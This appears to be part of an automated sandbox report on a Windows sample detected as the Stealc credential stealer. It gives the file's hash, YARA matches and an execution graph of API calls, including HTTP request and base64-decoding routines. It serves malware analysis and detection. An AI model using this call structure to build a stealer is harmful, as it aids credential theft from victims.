                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x540000
                    File size:1'860'608 bytes
                    MD5 hash:2252EE92F584848EAC43445204FEC9A4
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2174797423.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2133685233.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true


                      Execution Graph

                      Execution Coverage:8.1%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:9.7%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:24
13658 5569d8 ExitProcess 13657->13658 13660 555b1d 13659->13660 13661 55a740 lstrcpy 13660->13661 13662 555b2e 13661->13662 13895 55a820 lstrlen 13662->13895 13665 55a820 2 API calls 13666 555b64 13665->13666 13667 55a820 2 API calls 13666->13667 13668 555b74 13667->13668 13899 556430 13668->13899 13671 55a820 2 API calls 13672 555b93 13671->13672 13673 55a820 2 API calls 13672->13673 13674 555ba0 13673->13674 13675 55a820 2 API calls 13674->13675 13676 555bad 13675->13676 13677 55a820 2 API calls 13676->13677 13678 555bf9 13677->13678 13908 5426a0 13678->13908 13686 555cc3 13687 556430 lstrcpy 13686->13687 13688 555cd5 13687->13688 13689 55a7a0 lstrcpy 13688->13689 13690 555cf2 13689->13690 13691 55a9b0 4 API calls 13690->13691 13692 555d0a 13691->13692 13693 55a8a0 lstrcpy 13692->13693 13694 555d16 13693->13694 13695 55a9b0 4 API calls 13694->13695 13696 555d3a 13695->13696 13697 55a8a0 lstrcpy 13696->13697 13698 555d46 13697->13698 13699 55a9b0 4 API calls 13698->13699 13700 555d6a 13699->13700 13701 55a8a0 lstrcpy 13700->13701 13702 555d76 13701->13702 13703 55a740 lstrcpy 13702->13703 13704 555d9e 13703->13704 14634 557500 GetWindowsDirectoryA 13704->14634 13707 55a7a0 lstrcpy 13708 555db8 13707->13708 14644 544880 13708->14644 13710 555dbe 14789 5517a0 13710->14789 13712 555dc6 13713 55a740 lstrcpy 13712->13713 13714 555de9 13713->13714 13715 541590 lstrcpy 13714->13715 13716 555dfd 13715->13716 14805 545960 13716->14805 13718 555e03 14949 551050 13718->14949 13720 555e0e 13721 55a740 lstrcpy 13720->13721 13722 555e32 13721->13722 13723 541590 lstrcpy 13722->13723 13724 555e46 13723->13724 13725 545960 34 API calls 13724->13725 13726 555e4c 13725->13726 14953 550d90 13726->14953 13728 555e57 13729 55a740 lstrcpy 13728->13729 13730 555e79 13729->13730 13731 541590 lstrcpy 13730->13731 13732 555e8d 13731->13732 13733 545960 34 API calls 13732->13733 13734 555e93 13733->13734 14960 550f40 13734->14960 13736 555e9e 13737 541590 lstrcpy 13736->13737 13738 555eb5 
13737->13738 14965 551a10 13738->14965 13740 555eba 13741 55a740 lstrcpy 13740->13741 13742 555ed6 13741->13742 15309 544fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13742->15309 13744 555edb 13745 541590 lstrcpy 13744->13745 13746 555f5b 13745->13746 15316 550740 13746->15316 13748 555f60 13749 55a740 lstrcpy 13748->13749 13750 555f86 13749->13750 13751 541590 lstrcpy 13750->13751 13752 555f9a 13751->13752 13753 545960 34 API calls 13752->13753 13754 555fa0 13753->13754 13848 5445d1 RtlAllocateHeap 13847->13848 13850 544621 VirtualProtect 13848->13850 13850->13496 13852->13583 13854 5410c2 ctype 13853->13854 13855 5410fd 13854->13855 13856 5410e2 VirtualFree 13854->13856 13855->13613 13856->13855 13858 541233 GlobalMemoryStatusEx 13857->13858 13858->13616 13859->13640 13861 55a7c2 13860->13861 13862 55a7ec 13861->13862 13863 55a7da lstrcpy 13861->13863 13862->13645 13863->13862 13865 55a740 lstrcpy 13864->13865 13866 556833 13865->13866 13867 55a9b0 4 API calls 13866->13867 13868 556845 13867->13868 13869 55a8a0 lstrcpy 13868->13869 13870 55684e 13869->13870 13871 55a9b0 4 API calls 13870->13871 13872 556867 13871->13872 13873 55a8a0 lstrcpy 13872->13873 13874 556870 13873->13874 13875 55a9b0 4 API calls 13874->13875 13876 55688a 13875->13876 13877 55a8a0 lstrcpy 13876->13877 13878 556893 13877->13878 13879 55a9b0 4 API calls 13878->13879 13880 5568ac 13879->13880 13881 55a8a0 lstrcpy 13880->13881 13882 5568b5 13881->13882 13883 55a9b0 4 API calls 13882->13883 13884 5568cf 13883->13884 13885 55a8a0 lstrcpy 13884->13885 13886 5568d8 13885->13886 13887 55a9b0 4 API calls 13886->13887 13888 5568f3 13887->13888 13889 55a8a0 lstrcpy 13888->13889 13890 5568fc 13889->13890 13891 55a7a0 lstrcpy 13890->13891 13892 556910 13891->13892 13892->13652 13894 55a812 13893->13894 13894->13655 13896 55a83f 13895->13896 13897 555b54 13896->13897 13898 55a87b lstrcpy 13896->13898 13897->13665 13898->13897 13900 55a8a0 lstrcpy 13899->13900 13901 556443 13900->13901 13902 55a8a0 
lstrcpy 13901->13902 13903 556455 13902->13903 13904 55a8a0 lstrcpy 13903->13904 13905 556467 13904->13905 13906 55a8a0 lstrcpy 13905->13906 13907 555b86 13906->13907 13907->13671 13909 5445c0 2 API calls 13908->13909 13910 5426b4 13909->13910 13911 5445c0 2 API calls 13910->13911 13912 5426d7 13911->13912 13913 5445c0 2 API calls 13912->13913 13914 5426f0 13913->13914 13915 5445c0 2 API calls 13914->13915 13916 542709 13915->13916 13917 5445c0 2 API calls 13916->13917 13918 542736 13917->13918 13919 5445c0 2 API calls 13918->13919 13920 54274f 13919->13920 13921 5445c0 2 API calls 13920->13921 13922 542768 13921->13922 13923 5445c0 2 API calls 13922->13923 13924 542795 13923->13924 13925 5445c0 2 API calls 13924->13925 13926 5427ae 13925->13926 13927 5445c0 2 API calls 13926->13927 13928 5427c7 13927->13928 13929 5445c0 2 API calls 13928->13929 13930 5427e0 13929->13930 13931 5445c0 2 API calls 13930->13931 13932 5427f9 13931->13932 13933 5445c0 2 API calls 13932->13933 13934 542812 13933->13934 13935 5445c0 2 API calls 13934->13935 13936 54282b 13935->13936 13937 5445c0 2 API calls 13936->13937 13938 542844 13937->13938 13939 5445c0 2 API calls 13938->13939 13940 54285d 13939->13940 13941 5445c0 2 API calls 13940->13941 13942 542876 13941->13942 13943 5445c0 2 API calls 13942->13943 13944 54288f 13943->13944 13945 5445c0 2 API calls 13944->13945 13946 5428a8 13945->13946 13947 5445c0 2 API calls 13946->13947 13948 5428c1 13947->13948 13949 5445c0 2 API calls 13948->13949 13950 5428da 13949->13950 13951 5445c0 2 API calls 13950->13951 13952 5428f3 13951->13952 13953 5445c0 2 API calls 13952->13953 13954 54290c 13953->13954 13955 5445c0 2 API calls 13954->13955 13956 542925 13955->13956 13957 5445c0 2 API calls 13956->13957 13958 54293e 13957->13958 13959 5445c0 2 API calls 13958->13959 13960 542957 13959->13960 13961 5445c0 2 API calls 13960->13961 13962 542970 13961->13962 13963 5445c0 2 API calls 13962->13963 13964 542989 13963->13964 13965 5445c0 2 API calls 
13964->13965 13966 5429a2 13965->13966 13967 5445c0 2 API calls 13966->13967 13968 5429bb 13967->13968 13969 5445c0 2 API calls 13968->13969 13970 5429d4 13969->13970 13971 5445c0 2 API calls 13970->13971 13972 5429ed 13971->13972 13973 5445c0 2 API calls 13972->13973 13974 542a06 13973->13974 13975 5445c0 2 API calls 13974->13975 13976 542a1f 13975->13976 13977 5445c0 2 API calls 13976->13977 13978 542a38 13977->13978 13979 5445c0 2 API calls 13978->13979 13980 542a51 13979->13980 13981 5445c0 2 API calls 13980->13981 13982 542a6a 13981->13982 13983 5445c0 2 API calls 13982->13983 13984 542a83 13983->13984 13985 5445c0 2 API calls 13984->13985 13986 542a9c 13985->13986 13987 5445c0 2 API calls 13986->13987 13988 542ab5 13987->13988 13989 5445c0 2 API calls 13988->13989 13990 542ace 13989->13990 13991 5445c0 2 API calls 13990->13991 13992 542ae7 13991->13992 13993 5445c0 2 API calls 13992->13993 13994 542b00 13993->13994 13995 5445c0 2 API calls 13994->13995 13996 542b19 13995->13996 13997 5445c0 2 API calls 13996->13997 13998 542b32 13997->13998 13999 5445c0 2 API calls 13998->13999 14000 542b4b 13999->14000 14001 5445c0 2 API calls 14000->14001 14002 542b64 14001->14002 14003 5445c0 2 API calls 14002->14003 14004 542b7d 14003->14004 14005 5445c0 2 API calls 14004->14005 14006 542b96 14005->14006 14007 5445c0 2 API calls 14006->14007 14008 542baf 14007->14008 14009 5445c0 2 API calls 14008->14009 14010 542bc8 14009->14010 14011 5445c0 2 API calls 14010->14011 14012 542be1 14011->14012 14013 5445c0 2 API calls 14012->14013 14014 542bfa 14013->14014 14015 5445c0 2 API calls 14014->14015 14016 542c13 14015->14016 14017 5445c0 2 API calls 14016->14017 14018 542c2c 14017->14018 14019 5445c0 2 API calls 14018->14019 14020 542c45 14019->14020 14021 5445c0 2 API calls 14020->14021 14022 542c5e 14021->14022 14023 5445c0 2 API calls 14022->14023 14024 542c77 14023->14024 14025 5445c0 2 API calls 14024->14025 14026 542c90 14025->14026 14027 5445c0 2 API calls 14026->14027 
14028 542ca9 14027->14028 14029 5445c0 2 API calls 14028->14029 14030 542cc2 14029->14030 14031 5445c0 2 API calls 14030->14031 14032 542cdb 14031->14032 14033 5445c0 2 API calls 14032->14033 14034 542cf4 14033->14034 14035 5445c0 2 API calls 14034->14035 14036 542d0d 14035->14036 14037 5445c0 2 API calls 14036->14037 14038 542d26 14037->14038 14039 5445c0 2 API calls 14038->14039 14040 542d3f 14039->14040 14041 5445c0 2 API calls 14040->14041 14042 542d58 14041->14042 14043 5445c0 2 API calls 14042->14043 14044 542d71 14043->14044 14045 5445c0 2 API calls 14044->14045 14046 542d8a 14045->14046 14047 5445c0 2 API calls 14046->14047 14048 542da3 14047->14048 14049 5445c0 2 API calls 14048->14049 14050 542dbc 14049->14050 14051 5445c0 2 API calls 14050->14051 14052 542dd5 14051->14052 14053 5445c0 2 API calls 14052->14053 14054 542dee 14053->14054 14055 5445c0 2 API calls 14054->14055 14056 542e07 14055->14056 14057 5445c0 2 API calls 14056->14057 14058 542e20 14057->14058 14059 5445c0 2 API calls 14058->14059 14060 542e39 14059->14060 14061 5445c0 2 API calls 14060->14061 14062 542e52 14061->14062 14063 5445c0 2 API calls 14062->14063 14064 542e6b 14063->14064 14065 5445c0 2 API calls 14064->14065 14066 542e84 14065->14066 14067 5445c0 2 API calls 14066->14067 14068 542e9d 14067->14068 14069 5445c0 2 API calls 14068->14069 14070 542eb6 14069->14070 14071 5445c0 2 API calls 14070->14071 14072 542ecf 14071->14072 14073 5445c0 2 API calls 14072->14073 14074 542ee8 14073->14074 14075 5445c0 2 API calls 14074->14075 14076 542f01 14075->14076 14077 5445c0 2 API calls 14076->14077 14078 542f1a 14077->14078 14079 5445c0 2 API calls 14078->14079 14080 542f33 14079->14080 14081 5445c0 2 API calls 14080->14081 14082 542f4c 14081->14082 14083 5445c0 2 API calls 14082->14083 14084 542f65 14083->14084 14085 5445c0 2 API calls 14084->14085 14086 542f7e 14085->14086 14087 5445c0 2 API calls 14086->14087 14088 542f97 14087->14088 14089 5445c0 2 API calls 14088->14089 14090 542fb0 
14089->14090 14091 5445c0 2 API calls 14090->14091 14092 542fc9 14091->14092 14093 5445c0 2 API calls 14092->14093 14094 542fe2 14093->14094 14095 5445c0 2 API calls 14094->14095 14096 542ffb 14095->14096 14097 5445c0 2 API calls 14096->14097 14098 543014 14097->14098 14099 5445c0 2 API calls 14098->14099 14100 54302d 14099->14100 14101 5445c0 2 API calls 14100->14101 14102 543046 14101->14102 14103 5445c0 2 API calls 14102->14103 14104 54305f 14103->14104 14105 5445c0 2 API calls 14104->14105 14106 543078 14105->14106 14107 5445c0 2 API calls 14106->14107 14108 543091 14107->14108 14109 5445c0 2 API calls 14108->14109 14110 5430aa 14109->14110 14111 5445c0 2 API calls 14110->14111 14112 5430c3 14111->14112 14113 5445c0 2 API calls 14112->14113 14114 5430dc 14113->14114 14115 5445c0 2 API calls 14114->14115 14116 5430f5 14115->14116 14117 5445c0 2 API calls 14116->14117 14118 54310e 14117->14118 14119 5445c0 2 API calls 14118->14119 14120 543127 14119->14120 14121 5445c0 2 API calls 14120->14121 14122 543140 14121->14122 14123 5445c0 2 API calls 14122->14123 14124 543159 14123->14124 14125 5445c0 2 API calls 14124->14125 14126 543172 14125->14126 14127 5445c0 2 API calls 14126->14127 14128 54318b 14127->14128 14129 5445c0 2 API calls 14128->14129 14130 5431a4 14129->14130 14131 5445c0 2 API calls 14130->14131 14132 5431bd 14131->14132 14133 5445c0 2 API calls 14132->14133 14134 5431d6 14133->14134 14135 5445c0 2 API calls 14134->14135 14136 5431ef 14135->14136 14137 5445c0 2 API calls 14136->14137 14138 543208 14137->14138 14139 5445c0 2 API calls 14138->14139 14140 543221 14139->14140 14141 5445c0 2 API calls 14140->14141 14142 54323a 14141->14142 14143 5445c0 2 API calls 14142->14143 14144 543253 14143->14144 14145 5445c0 2 API calls 14144->14145 14146 54326c 14145->14146 14147 5445c0 2 API calls 14146->14147 14148 543285 14147->14148 14149 5445c0 2 API calls 14148->14149 14150 54329e 14149->14150 14151 5445c0 2 API calls 14150->14151 14152 5432b7 14151->14152 
14153 5445c0 2 API calls 14152->14153 14154 5432d0 14153->14154 14155 5445c0 2 API calls 14154->14155 14156 5432e9 14155->14156 14157 5445c0 2 API calls 14156->14157 14158 543302 14157->14158 14159 5445c0 2 API calls 14158->14159 14160 54331b 14159->14160 14161 5445c0 2 API calls 14160->14161 14162 543334 14161->14162 14163 5445c0 2 API calls 14162->14163 14164 54334d 14163->14164 14165 5445c0 2 API calls 14164->14165 14166 543366 14165->14166 14167 5445c0 2 API calls 14166->14167 14168 54337f 14167->14168 14169 5445c0 2 API calls 14168->14169 14170 543398 14169->14170 14171 5445c0 2 API calls 14170->14171 14172 5433b1 14171->14172 14173 5445c0 2 API calls 14172->14173 14174 5433ca 14173->14174 14175 5445c0 2 API calls 14174->14175 14176 5433e3 14175->14176 14177 5445c0 2 API calls 14176->14177 14178 5433fc 14177->14178 14179 5445c0 2 API calls 14178->14179 14180 543415 14179->14180 14181 5445c0 2 API calls 14180->14181 14182 54342e 14181->14182 14183 5445c0 2 API calls 14182->14183 14184 543447 14183->14184 14185 5445c0 2 API calls 14184->14185 14186 543460 14185->14186 14187 5445c0 2 API calls 14186->14187 14188 543479 14187->14188 14189 5445c0 2 API calls 14188->14189 14190 543492 14189->14190 14191 5445c0 2 API calls 14190->14191 14192 5434ab 14191->14192 14193 5445c0 2 API calls 14192->14193 14194 5434c4 14193->14194 14195 5445c0 2 API calls 14194->14195 14196 5434dd 14195->14196 14197 5445c0 2 API calls 14196->14197 14198 5434f6 14197->14198 14199 5445c0 2 API calls 14198->14199 14200 54350f 14199->14200 14201 5445c0 2 API calls 14200->14201 14202 543528 14201->14202 14203 5445c0 2 API calls 14202->14203 14204 543541 14203->14204 14205 5445c0 2 API calls 14204->14205 14206 54355a 14205->14206 14207 5445c0 2 API calls 14206->14207 14208 543573 14207->14208 14209 5445c0 2 API calls 14208->14209 14210 54358c 14209->14210 14211 5445c0 2 API calls 14210->14211 14212 5435a5 14211->14212 14213 5445c0 2 API calls 14212->14213 14214 5435be 14213->14214 14215 5445c0 2 
API calls 14214->14215 14216 5435d7 14215->14216 14217 5445c0 2 API calls 14216->14217 14218 5435f0 14217->14218 14219 5445c0 2 API calls 14218->14219 14220 543609 14219->14220 14221 5445c0 2 API calls 14220->14221 14222 543622 14221->14222 14223 5445c0 2 API calls 14222->14223 14224 54363b 14223->14224 14225 5445c0 2 API calls 14224->14225 14226 543654 14225->14226 14227 5445c0 2 API calls 14226->14227 14228 54366d 14227->14228 14229 5445c0 2 API calls 14228->14229 14230 543686 14229->14230 14231 5445c0 2 API calls 14230->14231 14232 54369f 14231->14232 14233 5445c0 2 API calls 14232->14233 14234 5436b8 14233->14234 14235 5445c0 2 API calls 14234->14235 14236 5436d1 14235->14236 14237 5445c0 2 API calls 14236->14237 14238 5436ea 14237->14238 14239 5445c0 2 API calls 14238->14239 14240 543703 14239->14240 14241 5445c0 2 API calls 14240->14241 14242 54371c 14241->14242 14243 5445c0 2 API calls 14242->14243 14244 543735 14243->14244 14245 5445c0 2 API calls 14244->14245 14246 54374e 14245->14246 14247 5445c0 2 API calls 14246->14247 14248 543767 14247->14248 14249 5445c0 2 API calls 14248->14249 14250 543780 14249->14250 14251 5445c0 2 API calls 14250->14251 14252 543799 14251->14252 14253 5445c0 2 API calls 14252->14253 14254 5437b2 14253->14254 14255 5445c0 2 API calls 14254->14255 14256 5437cb 14255->14256 14257 5445c0 2 API calls 14256->14257 14258 5437e4 14257->14258 14259 5445c0 2 API calls 14258->14259 14260 5437fd 14259->14260 14261 5445c0 2 API calls 14260->14261 14262 543816 14261->14262 14263 5445c0 2 API calls 14262->14263 14264 54382f 14263->14264 14265 5445c0 2 API calls 14264->14265 14266 543848 14265->14266 14267 5445c0 2 API calls 14266->14267 14268 543861 14267->14268 14269 5445c0 2 API calls 14268->14269 14270 54387a 14269->14270 14271 5445c0 2 API calls 14270->14271 14272 543893 14271->14272 14273 5445c0 2 API calls 14272->14273 14274 5438ac 14273->14274 14275 5445c0 2 API calls 14274->14275 14276 5438c5 14275->14276 14277 5445c0 2 API calls 
14276->14277 14278 5438de 14277->14278 14279 5445c0 2 API calls 14278->14279 14280 5438f7 14279->14280 14281 5445c0 2 API calls 14280->14281 14282 543910 14281->14282 14283 5445c0 2 API calls 14282->14283 14284 543929 14283->14284 14285 5445c0 2 API calls 14284->14285 14286 543942 14285->14286 14287 5445c0 2 API calls 14286->14287 14288 54395b 14287->14288 14289 5445c0 2 API calls 14288->14289 14290 543974 14289->14290 14291 5445c0 2 API calls 14290->14291 14292 54398d 14291->14292 14293 5445c0 2 API calls 14292->14293 14294 5439a6 14293->14294 14295 5445c0 2 API calls 14294->14295 14296 5439bf 14295->14296 14297 5445c0 2 API calls 14296->14297 14298 5439d8 14297->14298 14299 5445c0 2 API calls 14298->14299 14300 5439f1 14299->14300 14301 5445c0 2 API calls 14300->14301 14302 543a0a 14301->14302 14303 5445c0 2 API calls 14302->14303 14304 543a23 14303->14304 14305 5445c0 2 API calls 14304->14305 14306 543a3c 14305->14306 14307 5445c0 2 API calls 14306->14307 14308 543a55 14307->14308 14309 5445c0 2 API calls 14308->14309 14310 543a6e 14309->14310 14311 5445c0 2 API calls 14310->14311 14312 543a87 14311->14312 14313 5445c0 2 API calls 14312->14313 14314 543aa0 14313->14314 14315 5445c0 2 API calls 14314->14315 14316 543ab9 14315->14316 14317 5445c0 2 API calls 14316->14317 14318 543ad2 14317->14318 14319 5445c0 2 API calls 14318->14319 14320 543aeb 14319->14320 14321 5445c0 2 API calls 14320->14321 14322 543b04 14321->14322 14323 5445c0 2 API calls 14322->14323 14324 543b1d 14323->14324 14325 5445c0 2 API calls 14324->14325 14326 543b36 14325->14326 14327 5445c0 2 API calls 14326->14327 14328 543b4f 14327->14328 14329 5445c0 2 API calls 14328->14329 14330 543b68 14329->14330 14331 5445c0 2 API calls 14330->14331 14332 543b81 14331->14332 14333 5445c0 2 API calls 14332->14333 14334 543b9a 14333->14334 14335 5445c0 2 API calls 14334->14335 14336 543bb3 14335->14336 14337 5445c0 2 API calls 14336->14337 14338 543bcc 14337->14338 14339 5445c0 2 API calls 14338->14339 
14340 543be5 14339->14340 14341 5445c0 2 API calls 14340->14341 14342 543bfe 14341->14342 14343 5445c0 2 API calls 14342->14343 14344 543c17 14343->14344 14345 5445c0 2 API calls 14344->14345 14346 543c30 14345->14346 14347 5445c0 2 API calls 14346->14347 14348 543c49 14347->14348 14349 5445c0 2 API calls 14348->14349 14350 543c62 14349->14350 14351 5445c0 2 API calls 14350->14351 14352 543c7b 14351->14352 14353 5445c0 2 API calls 14352->14353 14354 543c94 14353->14354 14355 5445c0 2 API calls 14354->14355 14356 543cad 14355->14356 14357 5445c0 2 API calls 14356->14357 14358 543cc6 14357->14358 14359 5445c0 2 API calls 14358->14359 14360 543cdf 14359->14360 14361 5445c0 2 API calls 14360->14361 14362 543cf8 14361->14362 14363 5445c0 2 API calls 14362->14363 14364 543d11 14363->14364 14365 5445c0 2 API calls 14364->14365 14366 543d2a 14365->14366 14367 5445c0 2 API calls 14366->14367 14368 543d43 14367->14368 14369 5445c0 2 API calls 14368->14369 14370 543d5c 14369->14370 14371 5445c0 2 API calls 14370->14371 14372 543d75 14371->14372 14373 5445c0 2 API calls 14372->14373 14374 543d8e 14373->14374 14375 5445c0 2 API calls 14374->14375 14376 543da7 14375->14376 14377 5445c0 2 API calls 14376->14377 14378 543dc0 14377->14378 14379 5445c0 2 API calls 14378->14379 14380 543dd9 14379->14380 14381 5445c0 2 API calls 14380->14381 14382 543df2 14381->14382 14383 5445c0 2 API calls 14382->14383 14384 543e0b 14383->14384 14385 5445c0 2 API calls 14384->14385 14386 543e24 14385->14386 14387 5445c0 2 API calls 14386->14387 14388 543e3d 14387->14388 14389 5445c0 2 API calls 14388->14389 14390 543e56 14389->14390 14391 5445c0 2 API calls 14390->14391 14392 543e6f 14391->14392 14393 5445c0 2 API calls 14392->14393 14394 543e88 14393->14394 14395 5445c0 2 API calls 14394->14395 14396 543ea1 14395->14396 14397 5445c0 2 API calls 14396->14397 14398 543eba 14397->14398 14399 5445c0 2 API calls 14398->14399 14400 543ed3 14399->14400 14401 5445c0 2 API calls 14400->14401 14402 543eec 
14401->14402 14403 5445c0 2 API calls 14402->14403 14404 543f05 14403->14404 14405 5445c0 2 API calls 14404->14405 14406 543f1e 14405->14406 14407 5445c0 2 API calls 14406->14407 14408 543f37 14407->14408 14409 5445c0 2 API calls 14408->14409 14410 543f50 14409->14410 14411 5445c0 2 API calls 14410->14411 14412 543f69 14411->14412 14413 5445c0 2 API calls 14412->14413 14414 543f82 14413->14414 14415 5445c0 2 API calls 14414->14415 14416 543f9b 14415->14416 14417 5445c0 2 API calls 14416->14417 14418 543fb4 14417->14418 14419 5445c0 2 API calls 14418->14419 14420 543fcd 14419->14420 14421 5445c0 2 API calls 14420->14421 14422 543fe6 14421->14422 14423 5445c0 2 API calls 14422->14423 14424 543fff 14423->14424 14425 5445c0 2 API calls 14424->14425 14426 544018 14425->14426 14427 5445c0 2 API calls 14426->14427 14428 544031 14427->14428 14429 5445c0 2 API calls 14428->14429 14430 54404a 14429->14430 14431 5445c0 2 API calls 14430->14431 14432 544063 14431->14432 14433 5445c0 2 API calls 14432->14433 14434 54407c 14433->14434 14435 5445c0 2 API calls 14434->14435 14436 544095 14435->14436 14437 5445c0 2 API calls 14436->14437 14438 5440ae 14437->14438 14439 5445c0 2 API calls 14438->14439 14440 5440c7 14439->14440 14441 5445c0 2 API calls 14440->14441 14442 5440e0 14441->14442 14443 5445c0 2 API calls 14442->14443 14444 5440f9 14443->14444 14445 5445c0 2 API calls 14444->14445 14446 544112 14445->14446 14447 5445c0 2 API calls 14446->14447 14448 54412b 14447->14448 14449 5445c0 2 API calls 14448->14449 14450 544144 14449->14450 14451 5445c0 2 API calls 14450->14451 14452 54415d 14451->14452 14453 5445c0 2 API calls 14452->14453 14454 544176 14453->14454 14455 5445c0 2 API calls 14454->14455 14456 54418f 14455->14456 14457 5445c0 2 API calls 14456->14457 14458 5441a8 14457->14458 14459 5445c0 2 API calls 14458->14459 14460 5441c1 14459->14460 14461 5445c0 2 API calls 14460->14461 14462 5441da 14461->14462 14463 5445c0 2 API calls 14462->14463 14464 5441f3 14463->14464 
14465 5445c0 2 API calls 14464->14465 14466 54420c 14465->14466 14467 5445c0 2 API calls 14466->14467 14468 544225 14467->14468 14469 5445c0 2 API calls 14468->14469 14470 54423e 14469->14470 14471 5445c0 2 API calls 14470->14471 14472 544257 14471->14472 14473 5445c0 2 API calls 14472->14473 14474 544270 14473->14474 14475 5445c0 2 API calls 14474->14475 14476 544289 14475->14476 14477 5445c0 2 API calls 14476->14477 14478 5442a2 14477->14478 14479 5445c0 2 API calls 14478->14479 14480 5442bb 14479->14480 14481 5445c0 2 API calls 14480->14481 14482 5442d4 14481->14482 14483 5445c0 2 API calls 14482->14483 14484 5442ed 14483->14484 14485 5445c0 2 API calls 14484->14485 14486 544306 14485->14486 14487 5445c0 2 API calls 14486->14487 14488 54431f 14487->14488 14489 5445c0 2 API calls 14488->14489 14490 544338 14489->14490 14491 5445c0 2 API calls 14490->14491 14492 544351 14491->14492 14493 5445c0 2 API calls 14492->14493 14494 54436a 14493->14494 14495 5445c0 2 API calls 14494->14495 14496 544383 14495->14496 14497 5445c0 2 API calls 14496->14497 14498 54439c 14497->14498 14499 5445c0 2 API calls 14498->14499 14500 5443b5 14499->14500 14501 5445c0 2 API calls 14500->14501 14502 5443ce 14501->14502 14503 5445c0 2 API calls 14502->14503 14504 5443e7 14503->14504 14505 5445c0 2 API calls 14504->14505 14506 544400 14505->14506 14507 5445c0 2 API calls 14506->14507 14508 544419 14507->14508 14509 5445c0 2 API calls 14508->14509 14510 544432 14509->14510 14511 5445c0 2 API calls 14510->14511 14512 54444b 14511->14512 14513 5445c0 2 API calls 14512->14513 14514 544464 14513->14514 14515 5445c0 2 API calls 14514->14515 14516 54447d 14515->14516 14517 5445c0 2 API calls 14516->14517 14518 544496 14517->14518 14519 5445c0 2 API calls 14518->14519 14520 5444af 14519->14520 14521 5445c0 2 API calls 14520->14521 14522 5444c8 14521->14522 14523 5445c0 2 API calls 14522->14523 14524 5444e1 14523->14524 14525 5445c0 2 API calls 14524->14525 14526 5444fa 14525->14526 14527 5445c0 2 
API calls 14526->14527 14528 544513 14527->14528 14529 5445c0 2 API calls 14528->14529 14530 54452c 14529->14530 14531 5445c0 2 API calls 14530->14531 14532 544545 14531->14532 14533 5445c0 2 API calls 14532->14533 14534 54455e 14533->14534 14535 5445c0 2 API calls 14534->14535 14536 544577 14535->14536 14537 5445c0 2 API calls 14536->14537 14538 544590 14537->14538 14539 5445c0 2 API calls 14538->14539 14540 5445a9 14539->14540 14541 559c10 14540->14541 14542 55a036 8 API calls 14541->14542 14543 559c20 43 API calls 14541->14543 14544 55a146 14542->14544 14545 55a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14542->14545 14543->14542 14546 55a216 14544->14546 14547 55a153 8 API calls 14544->14547 14545->14544 14548 55a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14546->14548 14549 55a298 14546->14549 14547->14546 14548->14549 14550 55a2a5 6 API calls 14549->14550 14551 55a337 14549->14551 14550->14551 14552 55a344 9 API calls 14551->14552 14553 55a41f 14551->14553 14552->14553 14554 55a4a2 14553->14554 14555 55a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14553->14555 14556 55a4dc 14554->14556 14557 55a4ab GetProcAddress GetProcAddress 14554->14557 14555->14554 14558 55a515 14556->14558 14559 55a4e5 GetProcAddress GetProcAddress 14556->14559 14557->14556 14560 55a612 14558->14560 14561 55a522 10 API calls 14558->14561 14559->14558 14562 55a67d 14560->14562 14563 55a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14560->14563 14561->14560 14564 55a686 GetProcAddress 14562->14564 14565 55a69e 14562->14565 14563->14562 14564->14565 14566 55a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14565->14566 14567 555ca3 14565->14567 14566->14567 14568 541590 14567->14568 15687 541670 14568->15687 14571 55a7a0 lstrcpy 14572 5415b5 14571->14572 14573 55a7a0 lstrcpy 14572->14573 14574 5415c7 14573->14574 14575 55a7a0 lstrcpy 14574->14575 14576 
Control-flow graph edge data (node id, basic-block address, APIs called in that block, src->dst edges) behind the report's graph widget; the drawing itself is not recoverable from the text, but the API call structure is. Summarised by function:
• Request sender containing 544899 (entered after InternetCrackUrlA in 5447b0): lstrcpy/lstrcat string assembly through the 55a740, 55a7a0, 55a8a0, 55a920 and 55a9b0 helpers, then InternetOpenA + StrCmpCA (54490b), GetSystemTime via 558b60, InternetConnectA (544aa3), HttpOpenRequestA (544ad3), lstrlen (544de7, 544e03), HttpSendRequestA (544e13), an InternetReadFile loop (544e32/544e5e) and InternetCloseHandle (544e67, 544ebe, 544ecb). The reply then goes through 549ac0: CryptStringToBinaryA, LocalAlloc, CryptStringToBinaryA, LocalFree (a base64 decode with a size query first).
• Second sender containing 545979: the same sequence at 5459ee (InternetOpenA + StrCmpCA), 545b7c (InternetConnectA), 545bac (HttpOpenRequestA), 545e81 (lstrlen, GetProcessHeap, RtlAllocateHeap), 545f2a (HttpSendRequestA), 545f35 (InternetReadFile loop), 545f6a/545fb6/545fc3 (InternetCloseHandle), again followed by 549ac0 CryptStringToBinaryA on the reply.
• Reply handling at 5517c4: a StrCmpCA whose one branch goes straight to ExitProcess (5517cf) and whose other branch runs nine further StrCmpCA comparisons (55185d, 55187f, 5518ad, 5518cf, 5518f1, 551913, 551932, 551951, 551970) before returning at 5519c2. Further StrCmpCA chains sit at 550799/550865/55099c, 550e27/550e67/550ea4 and 550fb2.
